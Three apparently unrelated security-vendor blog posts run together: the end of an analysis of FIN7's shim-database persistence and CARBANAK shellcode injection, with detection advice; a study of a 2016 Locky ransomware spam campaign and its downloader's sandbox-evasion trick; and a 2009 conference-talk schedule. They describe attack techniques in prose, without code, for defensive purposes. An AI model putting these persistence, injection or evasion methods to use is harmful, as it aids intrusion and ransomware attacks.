Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process


Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 

Locky is Back Asking for Unpaid Debts

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. During this period, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample shown is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript based Downloader Updates

In this campaign, few updates were seen in both the JavaScript based downloader and the Locky payload.

The JavaScript downloader does the following:

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

5.     Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5: MZ header check

6.     Executes the decrypted payload by passing it the command line parameter, “123”.

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader. This command line parameter value is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed or compare the command line parameter with the expected value and gracefully exit if the check fails. However in the case of this Locky ransomware, the program does not exit (Figure 6) and the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, then the constant for the decryption routine is incorrect. This results in program crash as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.


As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes







Upcoming Jan & Feb Events Where We Are Presenting Research

We're sharing our research at the upcoming ISOI6, the US Dept of Defense Cyber Crime conference, Internet2 Joint Techs, and at ShmooCon. If you are attending any of those events, we'd love to meet you in person!  Alex talks about McColo, I'll be discussing Web malware in government networks, Stu covers the latest in malware obfusction tactics, and Julia dives into the Srizbi botnet takedown.  For Dates, times, topics, & locations, please read on.

A few more details for those in the area / attending:

Internet Security Operations and Intelligence (ISOI) 6

Jan. 29 in Dallas, TX

Alex speaks on the topic of McColo on Jan 29 at 15:30.  He'll discuss our efforts in working with coordinating bodies of the Internet and the press to facilitate the disconnection of McColo from the Internet. He'll also discuss how McColo (and botnet C&Cs hosted there!) re-connected to the Internet and what the bot herders may have done during that brief time.

U.S. Department of Defense (DoD) Cyber Crime

Conference 2009

Jan. 30 in St. Louis, MO

I'll be speaking on the topic, "Web Malware: Combating the New Keys to the Kingdom."  My session is this Friday, Jan 30 from 11:00 to 11:50 a.m. as part of the Information Assurance Track. I'll cover the threat and how today's countermeasures have been largely ineffective in preventing both the initial Web malware intrusions and the subsequent call backs to C&C infrastructures. I'll also examine the malware infection cycle and discuss how government agencies can take preventative measures.

Internet2 Joint Techs

Feb. 4 in College Station, TX

Stu's speaking on the topic, "Web Malware Tech: Obfuscation and other Evasion Techniques". His session is next Wed, Feb 4 from 8:50am till 9:10am where he talks about the increasing criminal sophistication of Web malware. He covers how a deadly cocktail of threats such as phishing spam containing URLs that load Web pages laced with obfuscated code has made almost all security technologies obsolete. For example, pretty much all serious Web malware infections use obfuscation as a way to infiltrate via port 80.

ShmooCon 2009

Feb. 6 in Washington, DC

Julia's session (The Srizbi Botnet Takedown) is during the Main Track day on Feb 6 at 17:00.  Julia covers how FireEye was able to hijack the Srizbi botnet, which was responsible for about 75% of all of the spam worldwide.

Hope to see a few of you there!